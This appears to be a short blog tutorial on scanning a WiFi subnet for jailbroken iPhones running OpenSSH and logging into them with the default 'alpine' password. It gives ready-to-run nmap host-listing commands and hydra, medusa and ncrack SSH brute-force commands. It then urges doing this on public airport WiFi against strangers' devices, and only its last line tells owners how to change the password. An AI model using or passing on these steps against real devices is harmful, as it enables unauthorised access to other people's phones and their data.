After jailbreak, most of the users will
install OPENSSH on their IOS device. However, some of the users might not know
or just forgot to change the default password. Below is the user list of an
iPhone:
The default password of the username root
and mobile is “alpine”.
So our goal is to scan a whole subnet and
find if there are any jailbroken IOS devices can be SSH login with the default
username and password.
Tools: nmap (v7.01) , hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).
1.
Connect your computer to the
wireless network and find out the IP range: 192.168.1.9/24.
2.
Use nmap to generate a hosts
list: nmap -sL 192.168.1.9/24 | grep "Nmap scan report" | awk '{print
$NF}' > hosts.lst
3.
Or if you only want to scan the
live hosts, you can use command: nmap -sP -n 192.168.1.9/24 | grep "Nmap
scan report"| awk '{print $NF}' > liveHosts.lst
4.
Create 2 text files:
username.txt and password.txt
5.
Run command: hydra -t 4 -L
username.txt -P password.txt -M hosts.lst -s 22 ssh
6.
It took 12 minutes to get the
password:
7.
Or you can use medusa: medusa
-H liveHosts.lst -U username.txt -P password.txt -M ssh
8.
Ncrack also can do the job: ncrack
-p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9.
And you can press 'p' to list discovered credentials during the scan.
Following the steps above, you can easily
modify the username and password file to perform a dictionary or brute force
attack.
Ok, that’s it. Next time, you go to an
airport, connect your Kali Linux to the free WIFI, have a cup of coffee and scan
the whole subnet. You might be surprised.
BTW, to change the password, just ssh to
the iPhone with root and use command “passwd” and “passwd mobile”